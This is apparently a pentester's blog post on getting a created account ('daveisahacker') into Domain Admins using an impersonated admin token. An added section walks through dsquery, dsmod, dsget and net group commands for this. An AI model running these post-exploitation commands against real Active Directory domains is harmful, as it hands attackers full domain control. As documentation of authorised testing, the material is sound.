Recently on an internal pentest I needed to get a new user into the Domain Admins group, which I couldn’t manage to accomplish with the usual net localgroup group username /add /domain command. I had managed to add a user to the domain – daveisahacker – using net user daveisahacker Password123 /add /domain.
I really needed to get a user into Domain Admins: I had a token impersonation of a domain admin, but couldn’t sign on to a DC because I had no password.
So I thought: what about the Directory Services commands – DSQUERY, DSMOD and all of the other DS commands? I might be able to add a user to the Domain Admins group that way.
DSQUERY Command @ Technet
http://technet.microsoft.com/en-us/library/cc732952(WS.10).aspx
DSMOD Command @ Technet
http://technet.microsoft.com/en-us/library/cc732406(WS.10).aspx
So, OK, let’s have a look at these commands and what to do with them.
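As an added example that is not part of the original post, here is the DS-command route end to end: look up the user, look up the group’s distinguished name, pipe one into the other, then verify. daveisahacker is the account the post created; the domain name corp.local (and so the DC=corp,DC=local part of the DNs) is an assumption, and the shell is assumed to be running under the impersonated domain-admin token the post describes.

```batch
rem Added example (not from the original post). Assumes the domain is corp.local
rem (hypothetical) and that this cmd shell runs under a domain-admin token.

rem 1. Confirm the account exists and print its distinguished name (DN).
dsquery user -samid daveisahacker

rem 2. Look up the Domain Admins group DN instead of guessing it.
dsquery group -samid "Domain Admins"

rem 3. Add the user. When -addmbr is given without a value, dsmod reads the
rem    member DNs from stdin, so dsquery's output can be piped straight in.
rem    (Replace the group DN with the one printed in step 2.)
dsquery user -samid daveisahacker | dsmod group "CN=Domain Admins,CN=Users,DC=corp,DC=local" -addmbr

rem 4. Verify: dsget lists the group's members; findstr narrows it to our user.
dsget group "CN=Domain Admins,CN=Users,DC=corp,DC=local" -members | findstr /i daveisahacker
```

dsquery, dsmod and dsget are part of the AD DS command-line tools, so they are present on domain controllers and on any machine with the RSAT AD tools installed; they talk to the directory over LDAP with the caller’s current token, which is why they work from an existing impersonated shell without a fresh logon. One caveat on the net commands: net localgroup only manages local groups, whereas Domain Admins is a global group, so the equivalent net command is net group "Domain Admins" daveisahacker /add /domain.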